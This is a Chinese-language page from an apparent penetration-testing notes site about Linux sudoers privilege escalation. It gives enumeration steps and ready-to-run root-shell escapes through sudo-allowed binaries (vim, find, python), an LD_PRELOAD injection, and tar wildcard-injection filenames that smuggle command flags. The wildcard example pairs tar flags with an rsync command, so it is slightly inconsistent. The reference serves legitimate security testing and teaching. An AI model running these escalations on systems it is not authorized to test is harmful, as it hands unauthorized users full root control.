> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/zh/privesc/sudoers.md).

# sudoers

Sudoers 权限提升始于用户可以通过以下方式运行的命令 `sudo`. 配置错误的二进制程序、不安全的脚本参数、符号链接处理以及存在漏洞的 sudo 版本，可能会把有限的 sudo 权限变成 root shell。

## 方法

* 运行 `sudo -l` 并记录每一条允许的命令、目标用户和 NOPASSWD 规则。
* 在 GTFOBins 中检查可用于逃逸到 shell、写文件以及由参数控制执行的条目。
* 检查脚本中的可写路径、符号链接处理、通配符展开以及缺失的文件引用。
* 检查 `sudo --version` 当该路径依赖于已知的 sudo CVE 时。

## 快速检查

```bash
sudo -l
sudo --version
```

## 常见的 Sudo 滥用

当 `sudo -l` 暴露出一个命令时，检查该命令是否可以启动 shell、写文件、跟随符号链接、加载插件，或展开由攻击者控制的通配符。

```bash
sudo -i
sudo vim -c '!sh'
sudo find . -exec /bin/sh \; -quit
sudo python -c 'import os; os.system("/bin/sh")'
```

### 环境变量保留

如果 `env_keep` 会保留加载器变量， `LD_PRELOAD` 或 `LD_LIBRARY_PATH` 这时可能会变得有用。先确认 sudoers 规则：

```bash
sudo -l
sudo LD_PRELOAD=/tmp/evil.so program
```

### 通配符利用

当某条 sudo 规则对由攻击者控制的文件名运行命令时，就会出现通配符滥用，例如使用以下方式的备份任务 `*.conf` 或使用以下方式的归档 `*`.

```bash
echo '命令' > exploit.conf
touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh shell.sh'
sudo /usr/bin/rsync *.conf /backup/
```

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo awk</h4></td><td>用于 Linux 权限提升的 Sudo (awk) 笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/ee83f87837593431127aeb56d9f2df29c0ee5ace">/pages/ee83f87837593431127aeb56d9f2df29c0ee5ace</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Nmap</h4></td><td>用于 Linux 权限提升的 Sudo (Nmap) 笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/1549cb6f7f25732c78dbe76d6aad1cbadd75d638">/pages/1549cb6f7f25732c78dbe76d6aad1cbadd75d638</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Perl</h4></td><td>用于 Linux 权限提升的 Sudo (Perl) 笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/c8f95dae09c9919c643fdf9878f352c921aa6d3f">/pages/c8f95dae09c9919c643fdf9878f352c921aa6d3f</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo GitPython</h4></td><td>用于 Linux 权限提升的 Sudo (GitPython) 笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/301000610ba450ddd9ccd1cb06387a8670c350a9">/pages/301000610ba450ddd9ccd1cb06387a8670c350a9</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo 版本 CVE 漏洞</h4></td><td>针对 CVE-2019-14287 和 CVE-2025-32463 的 Sudo 版本漏洞笔记，用于 Linux 权限提升。</td><td><a href="/pages/60001d5b9f87c82725a771d65fe77f64cd8e019e">/pages/60001d5b9f87c82725a771d65fe77f64cd8e019e</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo su</h4></td><td>用于 Linux 权限提升的 Sudo (su) 笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/d7ffda1d106f605d6d657e2fd6464e36a10f7036">/pages/d7ffda1d106f605d6d657e2fd6464e36a10f7036</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Knife</h4></td><td>用于 Linux 权限提升的 Sudo (Knife) 笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/4ac381da5b4b968e59d13ad6445190f7e485b1dd">/pages/4ac381da5b4b968e59d13ad6445190f7e485b1dd</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo ALL:ALL</h4></td><td>用于 Linux 权限提升的 Sudo (ALL:ALL) 笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/c461a1355ba8643cdd2cd6ec7a4fb87b80876edf">/pages/c461a1355ba8643cdd2cd6ec7a4fb87b80876edf</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo mosh-server</h4></td><td>用于 Linux 权限提升的 Sudo (Mosh-Server) 笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/31d7589470efd756a4c7bb86ff5f26ed1d41e602">/pages/31d7589470efd756a4c7bb86ff5f26ed1d41e602</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo iptables</h4></td><td>用于 Linux 权限提升的 Sudo (iptables) 笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/0bf84241b2f9b0f88e653c43c97eddb839ed99ca">/pages/0bf84241b2f9b0f88e653c43c97eddb839ed99ca</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Go</h4></td><td>用于 Linux 权限提升的 Sudo (Go) 笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/08b0046425279bc24428277fbb8ea62a40e9effe">/pages/08b0046425279bc24428277fbb8ea62a40e9effe</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo journalctl</h4></td><td>用于 Linux 权限提升的 Sudo (journalctl) 笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/4d7df808aaf028bcd70f0532ec34bb0fa4feaa0f">/pages/4d7df808aaf028bcd70f0532ec34bb0fa4feaa0f</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo Metasploit</h4></td><td>用于 Linux 权限提升的 Sudo (Metasploit) 笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/ab036827db85d1042e99c9a444928091098f29b6">/pages/ab036827db85d1042e99c9a444928091098f29b6</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo 缺失文件</h4></td><td>用于 Linux 权限提升的 Sudo（文件未找到）笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/008e9076ca81bbe91ba995982d17657df323f27d">/pages/008e9076ca81bbe91ba995982d17657df323f27d</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo bee 二进制文件</h4></td><td>用于 Linux 权限提升的 Sudo（bee 二进制文件）笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/70ff9c4f2bde1bb868958a231b223a7ab26c1c7f">/pages/70ff9c4f2bde1bb868958a231b223a7ab26c1c7f</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo bbot 二进制文件</h4></td><td>用于 Linux 权限提升的 Sudo（bbot 二进制文件）笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/4fbeeab38287a0c4c254b0daa8f347c85d716459">/pages/4fbeeab38287a0c4c254b0daa8f347c85d716459</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo ACL 符号链接滥用</h4></td><td>用于 Linux 权限提升的 Sudo ACL / 符号链接笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/75ee6e95901aa979a3a4c28595732322171eb508">/pages/75ee6e95901aa979a3a4c28595732322171eb508</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo 双重符号链接</h4></td><td>用于 Linux 权限提升的 Sudo（双重符号链接）笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/588ce2b35e6f62c1b6e971f3318b56e4af1c1369">/pages/588ce2b35e6f62c1b6e971f3318b56e4af1c1369</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo 备份二进制文件符号链接</h4></td><td>用于 Linux 权限提升的 Sudo（备份二进制文件 / 符号链接）笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/615603f87987713aee605c7799704e776e0deedf">/pages/615603f87987713aee605c7799704e776e0deedf</a></td></tr><tr><td><h3><i class="fa-terminal" style="color:$primary;">:terminal:</i></h3></td><td><h4>Sudo backy.sh 脚本</h4></td><td>用于 Linux 权限提升的 Sudo - backy.sh（脚本）笔记，包含枚举步骤、利用示例以及面向报告的验证。</td><td><a href="/pages/5d60ea7ad66cfcfe188717e96a9d8920fcf2ad7b">/pages/5d60ea7ad66cfcfe188717e96a9d8920fcf2ad7b</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/zh/privesc/sudoers.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
